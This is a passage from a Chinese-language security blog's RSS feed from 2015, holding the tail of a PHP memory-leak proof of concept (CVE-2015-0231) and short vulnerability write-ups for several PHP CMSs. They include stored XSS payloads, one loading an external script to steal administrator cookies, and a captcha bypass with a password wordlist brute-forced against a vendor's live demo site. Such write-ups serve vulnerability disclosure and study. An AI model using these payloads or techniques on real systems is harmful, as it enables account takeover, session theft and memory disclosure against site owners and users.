</span><span class="lit" style="color:#006666;">0</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $i </span><span class="pun" style="color:#666600;">&lt;</span><span class="pln" style="color:#000000;"> </span><span class="lit" style="color:#006666;">5</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> $i</span><span class="pun" style="color:#666600;">++)</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">{</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//this i value is larger than usually required</span><span class="pln" style="color:#000000;"> $v</span><span class="pun" style="color:#666600;">[</span><span class="pln" style="color:#000000;">$i</span><span class="pun" style="color:#666600;">]=</span><span class="pln" style="color:#000000;">$fakezval</span><span class="pun" style="color:#666600;">.</span><span class="pln" style="color:#000000;">$i</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//repeat to overwrite</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">}</span><span class="pln" style="color:#000000;"> </span><span class="com" style="color:#880000;">//due to the reference being overwritten by our loop above, leak memory</span><span class="pln" style="color:#000000;"> echo $obj</span><span class="pun" style="color:#666600;">-&gt;</span><span class="pln" style="color:#000000;">ccc</span><span class="pun" style="color:#666600;">;</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">?&gt;</span></pre>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    source:&nbsp;<a href="https://gist.github.com/tmm08a/4c3130001a258e45d39f#file-phpleak" target="_blank" class="ui-link" style="cursor:pointer;color:#3388CC;text-decoration:none;">PHPLeak</a>
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    下面是输出数据：
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/07ee4c4d0f40c37a55a5b5103973b4be20150211045716.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    我们这里做的操作是非常简单的（希望是）。我们创建自己的ZVAL（PHP使用的内部数据结构）数据结构。我们定义了几个东西，使pack（）函数获取我们的代码执行。按照顺序，它们是：
</p>
<pre class="prettyprint prettyprinted" style="padding:5px;font-size:1em;background-color:#EFEFEF;color:#333333;border:1px solid #CCCCCC;line-height:20px;"><code><span class="pun" style="color:#666600;">类型（例子中用的是</span><span class="kwd" style="color:#000088;">unsigned</span><span class="pln" style="color:#000000;"> </span><span class="kwd" style="color:#000088;">int</span><span class="pun" style="color:#666600;">）</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">地址（我们想要泄露的地址）</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">长度（我们想要泄露内存的长度）</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">参考标志（</span><span class="lit" style="color:#006666;">0</span><span class="pun" style="color:#666600;">）</span><span class="pln" style="color:#000000;"> </span><span class="pun" style="color:#666600;">数据类型（</span><span class="lit" style="color:#006666;">6</span><span class="pun" style="color:#666600;">，代表</span><span class="typ" style="color:#660066;">String</span><span class="pun" style="color:#666600;">类型）</span></code></pre>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    当然，如果我们没有伪造一个string ZVAL结构，这些值是会变化的。代码中的for循环是真正执行内存覆盖操作（覆盖之前释放掉的内存），这些操作使我们得到上述的输出数据。代码中我令循环数$i的值大于其所需的值，只是用以确保代码的通用性，当然我测试过的大多数机器只需要2次就可以了，不需要执行5次。
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    好了，现在已经可以泄露随意地址数据了，让我们再一起看看CVE-2015-0231？很简单：只需将“aaa”替换成“123”，看一下输出的数据：
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    <img src="http://nmap.cc/content/uploadfile/201502/cb387d038993e49f62431bc6fb4e59d820150211045717.png" style="max-width:100%;display:block;margin:0px auto;" />
</p>
<h1 style="font-size:0.9em;color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    0x03 下一步研究
</h1>
<hr style="border-style:solid none none;border-top-color:#CCCCCC;color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;" />
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    通过上述过程，我们已经完成了一个可在本地泄露任意内存地址数据的POC，且该POC同时适用于两个CVE漏洞的。我们下一步目标是仍然是数据泄露，所不同的是，将会是远程数据泄露！
</p>
<p style="color:#333333;font-family:'Microsoft YaHei', PingHei, 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif, 宋体;font-size:14px;line-height:24px;white-space:normal;background-color:#F9F9F9;">
    敬请期待第二回，远程数据泄露！
</p>]]></description>
    <pubDate>Wed, 11 Feb 2015 04:56:49 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/jsjl/196.html</guid>
</item>
<item>
    <title>Mao10CMS v3.1.0存储型xss</title>
    <link>http://nmap.cc/jsjl/195.html</link>
    <description><![CDATA[<p class="detail">
    在发布文章处，插入xss代码
</p>
<p class="detail usemasaic">
    <a href="http://static.wooyun.org/wooyun/upload/201501/1615304657122c9ba9810931f35408f3e4d07c08.jpg" target="_blank"><img src="http://nmap.cc/content/uploadfile/201502/e1160b76174f0b6e55110874a65042a320150209121646.jpg" alt="1.jpg" width="600" /></a>
</p>
<p class="detail">
    <br />
<br />
然后查看文章，直接执行了插入的js代码
</p>
<p class="detail usemasaic">
    <a href="http://static.wooyun.org/wooyun/upload/201501/16153214c65862ff23f38e37e3df222cd93f296d.jpg" target="_blank"><img src="http://nmap.cc/content/uploadfile/201502/30b5cf995abf8daabf64fad536bef49f20150209121647.jpg" alt="4.jpg" width="600" /></a>
</p>
<p class="detail">
    <br />
<br />
在测试demo的时候被阿里云的防护拦截了
</p>
<p class="detail usemasaic">
    <a href="http://static.wooyun.org/wooyun/upload/201501/16153550043c975cdbf9e965b2a322c4bb2dc50a.jpg" target="_blank"><img src="http://nmap.cc/content/uploadfile/201502/ef4dc763c1f8e757c1a2a3929750393820150209121647.jpg" alt="1.jpg" width="600" /></a>
</p>
<p class="detail">
    <br />
</p>
<p class="detail usemasaic">
    <a href="http://static.wooyun.org/wooyun/upload/201501/16153617d980aab272a1631bba19d5852149e821.jpg" target="_blank"><img src="http://nmap.cc/content/uploadfile/201502/cafc67b73ae1f9913687170d47c36fda20150209121648.jpg" alt="4.jpg" width="600" /></a>
</p>]]></description>
    <pubDate>Mon, 09 Feb 2015 12:15:59 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/jsjl/195.html</guid>
</item>
<item>
    <title>DOUPHP后台验证码绕过(官方DEMO测试)</title>
    <link>http://nmap.cc/jsjl/194.html</link>
    <description><![CDATA[<p class="detail">
    看起来有验证码，固定Cookie中的PHPSESSID不变即可进行暴力破解。<br />
<br />
<br />
<br />
admin/login.php  56-64行
</p>
<fieldset class="fieldset fieldset-code">
    <legend>code 区域</legend>
<pre><code>if (!is_array($user)) {

        $dou-&gt;create_admin_log($_LANG['login_action'] . ': ' . $_POST['user_name'] . " ( " . $_LANG['login_user_name_wrong'] . " ) ");

        $dou-&gt;dou_msg($_LANG['login_input_wrong'], 'login.php', 'out');

    } elseif (md5($_POST['password']) != $user['password']) {

        if ($_POST['password']) {

            $dou-&gt;create_admin_log($_LANG['login_action'] . ': ' . $_POST['user_name'] . " ( " . $_LANG['login_password_wrong'] . " ) ");

        }

        $dou-&gt;dou_msg($_LANG['login_input_wrong'], 'login.php', 'out');

    }</code></pre>
</fieldset>
<p class="detail">
    <br />
<br />
对登录失败判断没有对session的操作，只是dou_msg()。<br />
</p>
<p class="detail">
    我们的测试字典文件
</p>
<fieldset class="fieldset fieldset-code">
    <legend>code 区域</legend>
<pre><code>100123

101123

102123

103123

104123

105123

106123

107123

108123

109123

110123

111123

admin888

112123

113123

114123

115123

116123

117123

118123

119123</code></pre>
</fieldset>
<p class="detail">
    <br />
<br />
<br />
<br />
http://demo.douco.com/admin/login.php 这里是自带密码admin888的，我把它添加到playload里去。
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/c3ccae7caca7e958f984535b0a4b15f420150209121528.png" alt="无标题.png" width="600" />
</p>
<p><br /><br />
<br /><br />
正确密码返回302<br /><br />
<br /><br />
Response<br /><br />
<br /><br />
Location: <a href="http://demo.douco.com/admin/index.php">http://demo.douco.com/admin/index.php</a><br /><br />
<br /><br />
已经登录成功。</p>]]></description>
    <pubDate>Mon, 09 Feb 2015 12:14:41 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/jsjl/194.html</guid>
</item>
<item>
    <title>PHPCMS储存XSS，指哪儿打哪儿#2</title>
    <link>http://nmap.cc/jsjl/193.html</link>
    <description><![CDATA[<p class="detail">
    最近在学PHP，学了几天的PHP以后又来看了一下PHPCMS，代码审计一下吧。。还是一点也看不懂（额废话才学
几天PHP就想代码审计了？打死。。），唉苦逼的孩纸不会审计真蛋疼，那就黑盒再来看一遍吧，结果真的就又被我找到了一个，哈哈，存在XSS的地方在会员
中心--商务中心--商家资料--基本信息--经营地址那里，本来是想demo演示来着，但是由于实在商务中心需要管理员审核，官方测试的时候管理员还没
有审核就本地搭建环境演示了
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/0113c486f94dfa6f44e54e4ab66f817920150209121320.png" alt="1.png" width="600" /> 
</p>
<p class="detail">
    <br />
<br />
先下载了PHPCMS的最新版本，然后我们在会员中心--商务中心--商家资料--基本信息--经营地址那里插入"/&gt;&lt;svg onload=alert(/1/)&gt;
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/1ff64fb247269f21a3d57cd267c97de720150209121428.png" alt="2.png" width="600" /> 
</p>
<p class="detail">
    <br />
<br />
接下来来到后台查看发现是不能成功弹窗的，因为这个是在个人企业的首页
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/016f7fb66f9b2ba42b11100fa9dd58b320150209121428.png" alt="3.png" width="600" /> 
</p>
<p class="detail">
    <br />
<br />
没有弹窗肿么办呢？不急~一般管理员在审核通过之后都会去看一下这个企业吧，这个时候我们的机会就来了~后台点击我们的企业之后，可以看到来到企业首页，成功弹窗~
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/95ed9266c02f8bf4457b9b4502eaf88e20150209121428.png" alt="4.png" width="600" /> 
</p>
<p class="detail">
    <br />
<br />
接下来看看能不能打cookie，我们继续构造"&gt;&lt;script src=http://t.cn/RzLE1X0&gt;&lt;/script&gt;
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/c6adb92a9876b16f877a94f38a259a4420150209121428.png" alt="5.png" width="600" /> 
</p>
<p class="detail">
    <br />
<br />
可以看到cookie已经成功打到~因为这个企业是人人都可以看到的~而且一般管理员审核完之后也会去哦，好吧就算管理员审核之后不去看我们的企业（不大可能哈），那我们利用一些手法去让管理员看我们的企业还是很简单的吧~所以你们懂得~
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/c45b23b00a6623e51d8e11a25b02361f20150209121429.png" alt="6.png" width="600" /> 
</p>]]></description>
    <pubDate>Mon, 09 Feb 2015 12:12:37 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/jsjl/193.html</guid>
</item>
<item>
    <title>cmseay存储型跨站xss</title>
    <link>http://nmap.cc/jsjl/192.html</link>
    <description><![CDATA[<p class="detail">
    /bbs/ajax.php 19行
</p>
<fieldset class="fieldset fieldset-code">
    <legend>code 区域</legend>
<pre><code>$data['username'] = isset($_COOKIE['username']) ? $_COOKIE['username'] : '';</code></pre>
</fieldset>
<p class="detail">
    <br />
<br />
<br />
<br />
无过滤。。
</p>
<p class="detail">
    <br />
</p>
<p class="detail">
    ./bbs/360safe.php
</p>
<fieldset class="fieldset fieldset-code">
    <legend>code 区域</legend>
<pre><code>$cookiefilter = "\\b(and|or)\\b.{1,6}?(=|&gt;|&lt;|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|&lt;\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|\\/\\*.*?\\*\\/|'";</code></pre>
</fieldset>
<p class="detail">
    <br />
<br />
没有过滤iframe img 这些标签<br />
<br />
在bbs回复时 将cookie中的login_username 改为username
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/8350e63b7fb854bbf18e8aca1a59623b20150208063346.jpg" alt="54afca8c14233.jpg" width="600" /> 
</p>
<p class="detail">
    <br />
<br />
回复之后
</p>
<p class="detail usemasaic">
    <img src="http://nmap.cc/content/uploadfile/201502/b2fa96c3edeae03bb377c2820942aa1420150208063346.jpg" alt="2.jpg" width="600" /> 
</p>
<p><br /></p>]]></description>
    <pubDate>Sun, 08 Feb 2015 01:15:51 +0000</pubDate>
    <author>admin</author>
    <guid>http://nmap.cc/jsjl/192.html</guid>
</item></channel>
</rss>